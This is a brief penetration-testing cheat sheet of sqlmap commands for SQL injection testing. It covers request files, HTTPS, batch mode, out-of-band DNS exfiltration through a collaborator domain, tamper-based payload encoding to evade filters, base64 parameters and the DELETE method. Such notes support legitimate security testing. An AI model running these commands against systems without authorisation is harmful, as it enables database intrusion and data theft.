# SQLmap

### Documentation

<https://github.com/sqlmapproject/sqlmap/wiki/Usage>

### From Request - HTTP:80

```
sqlmap -r http.request -p param1 --level=5 --risk=3 --proxy=http://127.0.0.1:8080 
```

### From Request - HTTPS:443

```
sqlmap -r http.request --force-ssl -p param1 --level=5 --risk=3 --proxy=http://127.0.0.1:8080 
```

or the http.request file needs to have special HTTP header `Host: server:443`

### Batch Silent Mode without questions

```
sqlmap -r http.request --force-ssl --answers="follow=Y" --batch
```

### DNS Collaborator (under root)

Tip: register new HTTP proxy on port 8081 and send all probes from sqlmap to this lister in order filter proxy history based on sqlmap listener.

Use `--dns-domain` switch to instruct nmap use DNS probes against your collaborator server

```
sqlmap -r ./subs.sqli --proxy=http://127.0.0.1:8081 --dns-domain e7mxq58krq154r5ka6wess5el5ryfo3d.oastify.com --risk=3 --level=5
```

### Tampering

Tampering scripts for payload encoding using `--tamper` switch.

```
sqlmap -r ./subs.sqli --proxy=http://127.0.0.1:8080 --tamper="charencode" 
```

A list of all existing tampering scripts is available using `--list-tampers` switch or looking at github repository /tamper folder

{% embed url="<https://github.com/sqlmapproject/sqlmap/tree/master/tamper>" %}

### URL target & Parameters

```
sqlmap -u http://domain?id=1 -p id
```

You can read HTTP request from a file addressing payload by asterix symbol (\*).

```javascript
sqlmap -r ./sql.req

# sql.req is the following file containing HTTP request using  asterix () for parameter injection
GET /path/to/username*
Host: servername:port
```

### HTTP Proxy

```
sqlmap --proxy=http://127.0.0.1:8080 
```

### Databases

The most common DBMSs the remaining ones look at [sqlmap wiki --dbms](https://github.com/sqlmapproject/sqlmap/wiki/Usage#force-the-dbms).

```
--dbms=mssql|mysql|postgresql|oracle
```

### Base64 Encoding

By default sqlmap encode values in query string by URL encoding. When you need to encode payload using base64 encoding use the following switch with a parameter name

```
sqlmap -u domain?p1=value --base64=p1
```

### HTTP method - DELETE

```
sqlmap --method=DELETE -u http://domain -p param1
```